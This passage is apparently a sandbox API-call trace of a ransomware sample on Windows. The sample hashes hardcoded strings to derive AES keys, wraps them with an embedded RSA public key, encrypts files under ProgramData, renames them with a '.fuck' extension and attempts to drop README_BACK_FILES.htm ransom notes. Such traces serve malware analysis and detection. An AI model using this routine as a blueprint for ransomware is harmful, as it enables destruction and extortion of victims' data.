PublicKey.pbData=0x2809ab8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817198) returned 1 [0236.687] CryptEncrypt (in: hKey=0x2817198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.687] CryptEncrypt (in: hKey=0x2817198, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2814d58*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2814d58*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.687] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2814d58, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.687] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.687] CryptEncrypt (in: hKey=0x2817098, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.687] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.687] CloseHandle (hObject=0xffffffff) returned 1 [0236.687] CloseHandle (hObject=0xffffffff) returned 1 [0236.687] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), bFailIfExists=0) returned 0 [0236.688] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico", dwFileAttributes=0x0) returned 0 [0236.688] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.gsg")) returned 0 [0236.688] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\sync.ico.fuck")) returned 0 [0236.689] CryptDestroyHash (hHash=0x2817118) returned 1 [0236.689] CryptDestroyKey (hKey=0x2817098) returned 1 [0236.689] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.689] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.689] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.689] GetLastError () returned 0x5 [0236.689] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml")) returned 0x20 [0236.689] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x80) returned 0 [0236.689] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.690] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.690] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.690] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.695] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.695] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.695] CryptHashData (hHash=0x28173d8, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.695] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x28173d8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2817298) returned 1 [0236.695] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.696] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.696] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2815088) returned 1 [0236.697] CryptImportPublicKeyInfo (in: hCryptProv=0x2815088, dwCertEncodingType=0x1, pInfo=0x2809dc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809df0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809df8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817018) returned 1 [0236.697] CryptEncrypt (in: hKey=0x2817018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.697] CryptEncrypt (in: hKey=0x2817018, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2814de0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x2814de0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2814de0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.697] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.697] CryptEncrypt (in: hKey=0x2817298, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.697] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.697] CloseHandle (hObject=0xffffffff) returned 1 [0236.697] CloseHandle (hObject=0xffffffff) returned 1 [0236.698] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), bFailIfExists=0) returned 0 [0236.698] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml", dwFileAttributes=0x0) returned 0 [0236.699] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.gsg")) returned 0 [0236.699] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml.fuck")) returned 0 [0236.699] CryptDestroyHash (hHash=0x28173d8) returned 1 [0236.699] CryptDestroyKey (hKey=0x2817298) returned 1 [0236.699] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.699] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.699] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0236.699] GetLastError () returned 0x5 [0236.700] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico")) returned 0x20 [0236.708] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x80) returned 0 [0236.709] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.709] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.709] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg", dwFileAttributes=0x2) returned 0 [0236.710] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x2816980) returned 1 [0236.727] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0236.727] lstrlenA (lpString="ZiEnGWXxVFRxNONCYhHbvsvTzMlQm") returned 29 [0236.727] CryptHashData (hHash=0x2817098, pbData=0x2ecb48, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.727] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x2817098, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28171d8) returned 1 [0236.727] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.727] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0236.727] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x2814ef0) returned 1 [0236.728] CryptImportPublicKeyInfo (in: hCryptProv=0x2814ef0, dwCertEncodingType=0x1, pInfo=0x2809e90*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2809ec0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2809ec8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2817218) returned 1 [0236.728] CryptEncrypt (in: hKey=0x2817218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0236.728] CryptEncrypt (in: hKey=0x2817218, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28156e8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28156e8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0236.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28156e8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.729] ReadFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x279e3a8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0236.729] CryptEncrypt (in: hKey=0x28171d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x279e3a8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0236.729] WriteFile (in: hFile=0xffffffff, lpBuffer=0x279e3a8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0236.729] CloseHandle (hObject=0xffffffff) returned 1 [0236.729] CloseHandle (hObject=0xffffffff) returned 1 [0236.729] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), bFailIfExists=0) returned 0 [0236.732] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico", dwFileAttributes=0x0) returned 0 [0236.733] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.gsg")) returned 0 [0236.733] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.fuck" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico.fuck")) returned 0 [0236.733] CryptDestroyHash (hHash=0x2817098) returned 1 [0236.733] CryptDestroyKey (hKey=0x28171d8) returned 1 [0236.733] CryptReleaseContext (hProv=0x2816980, dwFlags=0x0) returned 1 [0236.733] FindNextFileA (in: hFindFile=0x2816d58, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0236.733] FindClose (in: hFindFile=0x2816d58 | out: hFindFile=0x2816d58) returned 1 [0236.734] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\readme_back_files.htm")) returned 0xffffffff [0236.734] AreFileApisANSI () returned 1 [0236.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0236.734] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.734] GetLastError () returned 0x5 [0236.734] GetLastError () returned 0x5 [0236.734] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0236.734] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2817098 [0236.736] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.736] FindNextFileA (in: hFindFile=0x2817098, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0236.736] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x2817298 [0236.740] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0236.740] FindNextFileA (in: hFindFile=0x2817298, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0236.740] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0236.740] GetLastError () returned 0x5 [0236.740] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml")) returned 0x20 [0236.740] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml", dwFileAttributes=0x80) returned 0 [0236.741] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.741] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg" (normalized: "c:\\programdata\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0236.741] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml.gsg", dwFileAttributes=0x2) returned 0 [0236.741] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2816980) returned 1 [0236.749] CryptCreateHash (in: hProv=0x2816980, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0236.749] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0236.749] CryptHashData (hHash=0x28171d8, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0236.749] CryptDeriveKey (in: hProv=0x2816980, Algid=0x6610, hBaseData=0x28171d8, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x28173d8) returned 1 [0236.749] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0236.749] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0236.749] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2815220) returned 1 [0236.751] CryptImportPublicKeyInfo (in: hCryptProv=0x2815220, dwCertEncodingType=0x1, pInfo=0x280a370*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x280a3a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x280a3a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2816d58) returned 1 [0236.751] CryptEncrypt (in: hKey=0x2816d58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0236.751] CryptEncrypt (in: hKey=0x2816d58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2814e68*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2814e68*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0236.751] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2814e68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0236.751] ReadFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x277e300, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0236.751] CryptEncrypt (in: hKey=0x28173d8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0236.751] WriteFile (in: hFile=0xffffffff, lpBuffer=0x277e300, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: 